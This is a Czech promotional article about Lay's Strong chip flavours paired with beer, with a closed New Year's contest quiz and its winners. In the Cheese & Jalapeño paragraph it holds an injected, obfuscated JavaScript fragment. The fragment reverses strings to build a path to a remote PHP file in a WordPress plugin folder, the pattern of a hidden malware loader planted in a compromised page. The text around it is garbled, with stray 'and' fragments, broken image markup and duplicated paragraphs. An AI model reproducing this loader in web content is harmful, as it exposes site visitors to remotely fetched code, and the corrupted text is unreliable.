FACESTARSoutěžeUkončeno! Vylaďte se na Silvestra: Lay’s Strong a pivo patří k sobě!

Ukončeno! Vylaďte se na Silvestra: Lay’s Strong a pivo patří k sobě!

Vybrat si můžete hned ze čtyř opravdu ostrých příchutí. Skutečnost, že se tato řada chipsů Lay’s skvěle hodí k pivu, je zřejmá hned na první pohled díky novým obalům připomínajícím pivní etikety.

Vybrat si můžete hned ze čtyř opravdu ostrých příchutí. Skutečnost, že se tato řada chipsů Lay’s skvěle hodí k pivu, je zřejmá hned na první pohled díky novým obalům připomínajícím pivní etikety.

andÚplnou novinkou jsou Lay’s Strong Hot Chicken Wings. Neexistuje nic, co by se k pivu hodilo více než chuť propečených kuřecích stehýnek. Pokud se vám nechce zrovna péct hromada kuřecích paliček, sáhněte po pytlíku Lay’s s touto příchutí. Pikantní chuť ohnivého kuřete skvěle uhasíte světlým ležákem.and

Další z variant Lay’s Strong Chilli & Lime je dochucena pálivými chilli papričkami a limetkou. Chilli není nijak dramatické a zanechává v ústech příjemnou pikantní chuť. Navíc sladší a méně kyselý příbuzný citronu ostrou chuť papriček ještě zjemní. Lehce pálivá chuť se perfektně hodí k tmavým pivům, což zajisté ocení i něžné pohlaví.

Ostré pro pořádné chlapyand

Pořádná nálož ostrosti se ukrývá v balíčku Lay’s Strong Wasabi, které nakopnou hned při prvním lupínku. Typická štiplavá chuť „japonského křenu“ se postupně vráží až do nosu a jedinou možností, jak jí zastavit, je vychlazené pivo. K této příchuti kromě klasického skvěle pasuje také řezané.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahand_jalapeno_77g-2016-1.png“ alt=““ width=“140″ height=“190″>Lay’s Strong Cheese&Jalapeno vám připomenou jednu z nejostřejších zemí světa – Mexiko. V opravdové mexické příchuti nesmí samozřejmě chybět typické ingredience – sýr cheddar a papričky jalapeño, které jsou v porovnání s chilli papričkami méně pálivé, ale i tak tě dokáží pořádně rozehřát. Pivo si k nim můžeš dopřát tak, jak se pije v Mexiku, se solí, limetkou a ledem.

Rozpalte to na Silvestra 

Připravili jsme pro vás exkluzivní soutěž, ve které můžete vyhrát originální dárkové balení Lay’s, kde najdete všechny novinky pohromadě. Stačí správně odpovědět na soutěžní otázky a být ve správném pořadí. Ve hře jsou celkem 3 balíčky.

Soutěžní otázka zní: Scovilleova stupnice měří pálivost paprik a chilli papriček. Jaká je hodnota pálivosti papriček jalapeño?

a) 1000 – 8500

b) 2500 – 8000

c) 5500 – 9500

K čemu se chipsy Lay’s Strong nejvíce hodí? 

a) k pivu

b) k Pepsi

c) k vodě

Správné odpovědi zasílejte na e-mailovou adresu soutez@facestar.cz, do pole předmět napište „Lays“, dále nezapomeňte uvést své jméno a příjmení, kontaktní adresu a telefonní spojení. Soutěž probíhá od 4.12. do 18.12. 2016. Vyhrává každý 400. email se správnou odpovědí v pořadí.

Gratulujeme a výhry posíláme: E. Holíková, Pelhřimov, J. Rokošková Brno, K. Lukáš, Hradec Králové.

Související články